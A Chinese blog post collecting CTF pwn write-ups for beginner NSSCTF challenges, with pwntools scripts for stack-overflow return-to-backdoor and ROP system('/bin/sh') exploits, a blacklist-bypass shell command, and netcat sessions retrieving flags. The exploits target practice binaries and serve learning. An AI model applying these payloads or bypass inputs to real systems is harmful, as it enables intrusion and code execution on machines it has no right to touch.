pwn刷题小记

已于 2024-03-04 09:00:54 修改
阅读量470 收藏 11
点赞数 6
文章标签: java jvm linux
于 2024-02-29 20:23:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzzob/article/details/136380157
版权
文章分享了多个网络安全竞赛中的Pwn挑战,如使用nc进行连接、系统调用漏洞利用、栈溢出攻击等,展示了参赛者如何通过payload和exploitation技巧解决gift_pwn任务。
摘要由CSDN通过智能技术生成

[SWPUCTF 2021 新生赛]nc签到

用记事本直接打开 

import os
art = '''

   ((  "####@@!!$$    ))
       `#####@@!$$`  ))
    ((  '####@!!$:
   ((  ,####@!!$:   ))
       .###@!!$:
       `##@@!$:
        `#@!!$
  !@#    `#@!$:       @#$
   #$     `#@!$:       !@!
            '@!$:
        '`\   "!$: /`'
           '\  '!: /'
             "\ : /"
  -."-/\\\-."//.-"/:`\."-.JrS"."-=_\\
" -."-.\\"-."//.-".`-."_\\-.".-\".-//'''
print(art)
print("My_shell_ProVersion")
blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']
while True:
    command = input()
    for i in blacklist:
        if i in command:
            exit(0)
    os.system(command)

 tac$IFS$1flag

[SWPUCTF 2021 新生赛]gift_pwn

main函数里面只有vuln

得到差0x10

看到gift函数里有system

from pwn import *
day3 = remote("node4.anna.nssctf.cn", 28198)
gift = 0x4005B6

payload = b'a' * (0x10 + 8) + p64(gift)

day3.sendline(payload)
day3.interactive()

不知道为什么p64是红色的还能运行,奇怪捏 

nssctf [SWPUCTF 2021 新生赛]gift_pwn-CSDN博客

[LitCTF 2023]只需要nc一下~

nc连接

env查看

 [CISCN 2019华北]PWN1

checksec --file='/home/kali/Desktop/[CISCN 2019华北]PWN1 (1)'

a.

int func()
{
  char v1[44]; // [rsp+0h] [rbp-30h] BYREF
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets(v1);
  if ( v2 == 11.28125 )
    return system("cat /flag");
  else
    return puts("Its value should be 11.28125");
}
from pwn import *

io = remote("node4.anna.nssctf.cn",28721)
#io = process("D:\浏览器下载\[CISCN 2019华北]PWN1")
payload = cyclic(0x30 - 0x4) + p64(0x41348000)
io.sendline(payload)
io.interactive()

双击黄色字体 

 b.

 

from pwn import *
r=remote(" ",port)  #port是端口号
addr=0x4006BE
payload=b'a'*(0x30+0x8)+p64(addr) #0x30指v1到ebp的偏移量,ida中给出
r.sendline(payload)
r.interactive()

 [NISACTF 2022]ReorPwn?

ida打开

__int64 __fastcall fun(const char *a1)
{
  __int64 result; // rax
  char v2; // [rsp+17h] [rbp-9h]
  int i; // [rsp+18h] [rbp-8h]
  int v4; // [rsp+1Ch] [rbp-4h]

  v4 = strlen(a1);
  for ( i = 0; ; ++i )
  {
    result = (unsigned int)(v4 / 2);
    if ( i >= (int)result )
      break;
    v2 = a1[i];
    a1[i] = a1[v4 - i - 1];
    a1[v4 - i - 1] = v2;
  }
  return result;
}

逆序输出

system执行, 

a="123456"
b=a[::-1]
print(b)
b=a[::-2]
print(b)
b=a[1::]
print(b)
b=a[-1::]
print(b)
b=a[1:]
print(b)
b=a[:-1]
print(b)
'''
654321
642
23456
6
23456
12345
'''

[BJDCTF 2020]babystack2.0 

main:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[12]; // [rsp+0h] [rbp-10h] BYREF
  size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF

  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf("%d", &nbytes);
  if ( (int)nbytes > 10 )
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  puts("[+]What's u name?");
  read(0, buf, (unsigned int)nbytes);
  return 0;
}

ackdoor:

__int64 backdoor()
{
  system("/bin/sh");
  return 1LL;
}

from pwn import *
r=remote("node4.anna.nssctf.cn",28623)  #port是端口号
r.sendlineafter('your name:', b'-1')
addr=0x400726
payload=b'a'*(0x10+0x8)+p64(addr)
r.sendlineafter("name?",payload)
r.interactive()

 【PWN · ret2text】——[CTFHub]ret2text_ctfhub ret2text-CSDN博客

[HNCTF 2022 Week1]easync

┌──(kali㉿kali)-[~]
└─$ nc node5.anna.nssctf.cn 28081
ls
bin
dev
easync
flag
gift
lib
lib32
lib64
libexec
libx32
nothing
ls nothing
flag1
cat nothing/flag1
nssctf{Nc_
ls gift
2galf
flag2
cat gift/flag2
cat: gift/flag2: Is a directory
cat gift/2galf
@nd_g3t5h31L}

 拼接两端flag即可

 [BJDCTF 2020]babystack

from pwn import *
r=remote("node4.anna.nssctf.cn",28193)  #port是端口号
r.sendlineafter('your name:', b'-1')
addr=0x4006E6
payload=b'a'*(0x10+0x8)+p64(addr)
r.sendlineafter("name?",payload)
r.interactive()

 [SWPUCTF 2022 新生赛]Does your nc work?

ls
bin
dev
lib
lib32
lib64
libx32
nss
pwn
cd pwn
/bin/sh: 12: cd: can't cd to pwn
cd nss
ls
ctf
cd ctf
ls
flag
cat flag
NSSCTF{f547677d-eafb-4fd0-8c5d-6d2eafaf067f}

[NISACTF 2022]ezstack

栈读入溢出,

shift+f12 

from pwn import *
p=remote("node5.anna.nssctf.cn",28063)
system_plt=0x08048390
sh_addr=0x0804A024
playload=b'b'*(0x48+4)+p32(system_plt)+p32(0x0)+p32(sh_addr)
p.sendline(playload)
p.interactive()

[watevrCTF 2019]Voting Machine 1 

shift+f12,找到flag.txt

根据list跳转 

from pwn import *
i = remote("node5.anna.nssctf.cn",28478)
address = 0x400807
payload = b'a'*(0x2+8) +p64(address)
i.sendline(payload)
i.interactive()

[NISACTF 2022]ezpie 

能用x64打开的都是64位,否则是32位

from pwn import *
i = remote("node5.anna.nssctf.cn",28041)
text=i.recvuntil("70")[-10:]
ld=int(text,16)
print(ld)
pwn=ld+0x9f
pd=b'a'*(0x28+4)+p32(pwn)
i.sendline(pd)
i.interactive()

[HGAME 2023 week1]test_nc 

[GFCTF 2021]where_is_shell 

from pwn import *
io = remote("node4.anna.nssctf.cn",28113)
context(arch='amd64')
elf = ELF("D:\yzzob\Desktop\shell")

system_plt = elf.plt['system']
bin_sh = 0x400541
pop_rdi_ret = 0x4005e3
ret_addr = 0x400416

payload = flat([b'A' * 24, ret_addr, pop_rdi_ret, bin_sh, system_plt])

io.sendline(payload)
io.interactive()

 

yzzob
关注
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4358
BUUCTF刷题记录
BUUCTF-PWN刷题记录-7
weixin_44145820的博客
04-15 1057
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
LitCTF PWN题解
ctfpwn的博客
06-02 630
接下来就是正常的64位ret2libc过程,找一个pop寄存器和ret地址,用这条指令:ROPgadget --binary pwn --only 'pop|ret'看看c伪代码,很容易看出是ret2libc题,并且对read读入的数据有一个strlen的判断,如果大于0x50就跳出。直接nc之后ls查看一下目录,看到一个dockerfile,cat一下就能发现打开flag文件的方式。然后通过给的libc文件计算偏移,得到system函数和/bin/sh字符串的地址。咳咳,接下来是正题。
{NSSCTF} [LitCTF 2023]只需要nc一下~ 详解
lfc18950509270的博客
10-16 476
其他的nc题就不写了,这题主要是给小白一个提示,现成的shell如果怎么都找不到flag,可以试试找找环境变量里面。可以直接用env,也可以使用echo $FLAG(记得大写)
[LitCTF 2023]只需要nc一下~
最新发布
2301_80243833的博客
07-24 154
如果我们怎么都找不到flag,可以试试找找环境变量里面。
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 771
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
[BUUCTF]Pwn刷题记录
x0r
10-13 254
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
Jarvis OJ pwn刷题
清霂的博客
03-26 260
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
BUU pwn 刷题
qq_36495104的博客
05-19 1587
这里基本都是栈溢出题,没什么技术含量,只作为记录 [第五空间2019 决赛]PWN5 查看保护 开启了canary和栈不可执行保护 IDA反编译得到main函数 int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 int result; // eax char nptr; // [esp+4h] [ebp-80h] char buf; // [esp+14h] [ebp-70h] unsigned
Pwn刷题记录(不停更新)
qq_66013948的博客
06-23 384
​ 发现了个事儿,for循环会执行两次,所以这里采用第一次不溢出,通过格式化字符串漏洞对Canary的值进行泄露,之后就可以在合适的地方填入canary的值来绕过canary保护了。​ 之后就是具体进行溢出了,计算溢出的长度也比较简单,这里直接上答案吧,116字节,不过,第100到104为canary的值。​ 根据这俩进行计算,可得到偏移,结果是0x7c/4=31。​ 除了NX之外,似乎就只有 Canary了。​ 因此,思路就很明确了。
LitCTF2023 郑州轻工业大学首届网络安全赛 WP 部分
Aluxian_的博客
05-14 8020
由于刚接触CTF没多久 还是属于萌新级别的(中专高中生)也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。PS:记得所有的flag都改为NSSCTF或者LitCTF。
LitCTF2023 WP
一个普普通通的博客
05-18 907
LitCTF2023是郑州轻工业大学首届网络安全赛,作为第一次举办的网络安全类型的校赛,它的难度极其容易,很加适合对CTF感兴趣但是没有基础的同学。
pwn刷题num42---ret2libc(不容易)
tbsqigongzi的博客
05-02 1151
BUUCTF-PWN-pwn2_sctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 atoi会将一个字符串并转化为有符号整形(signed int),而我们只需要输入-1,即可绕过if(v2>32),使read函数读入非常大的数,造成栈溢出,查看一下程序,发
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 2280
经典栈溢出漏洞。
C语言 利用setvbuf来设置缓冲区的模式
TomCat的播客
06-30 868
setvbuf主要用于优化内存提高系统效率。 int setvbuf(FILE *stream, char *buffer, int mode, size_t size) stream – 这是指向 FILE 对象的指针,该 FILE 对象标识了一个打开的流。 buffer – 这是分配给用户的缓冲。如果设置为 NULL,该函数会自动分配一个指定大小的缓冲。 mode – 这指定了文件缓冲的模...
PWN学习-ADworld刷题
WocW的博客
06-04 1633
前言 搁置了一段时间没更博,经历了考试还有一些其他事,决心好好去学pwn。学习的方法打算是按照看视频课加刷题加查找资料来学习。 先把新手题都刷了一遍,都是很入门的题目,没啥好提的,收获也少。然后去刷进阶的题,但是目前还没有遇到堆的题目,视频课已经快学完了,学习资料是看的B站上的这个,觉得讲的很好,YOTUBE上也有 讲一下刷进阶题时个人遇到的一些坑…或者是学到的东西 分析 pwn-100 检查...
pwn刷题writeup(后续更新)
weixin_43342135的博客
08-12 1236
bugku的pwn1: 这道题没啥说的, 直接在linu下执行语句:nc 114.116.54.89 10001, 再 ls 命令展示当下目录, 然后 cat flag 读取目标文件, 一般来说是flag这个文件有flag,但是也不排除其它的地方有flag。 Bugku的pwn2: 第一步先nc上去程序,然后观看程序的作用。 传文件进入linux,再然后file pwn2,che...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值